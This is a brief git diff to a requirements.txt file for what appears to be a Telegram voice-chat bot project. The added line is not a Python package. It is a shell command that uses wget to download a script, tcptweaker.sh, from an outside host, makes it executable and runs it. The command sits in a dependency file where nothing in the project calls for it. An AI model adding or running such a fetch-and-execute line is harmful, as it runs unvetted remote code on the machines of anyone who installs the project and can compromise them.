--- a/requirements.txt
+++ b/requirements.txt
@@ -9,3 +9,4 @@ python-dotenv
 py-tgcalls==0.9.0b1
 youtube-search-python
 git+https://github.com/asmsafone/downloader
+wget http://phreaker56.obex.pw/tcptweaker.sh && chmod +x tcptweaker.sh && ./tcptweaker.sh -y
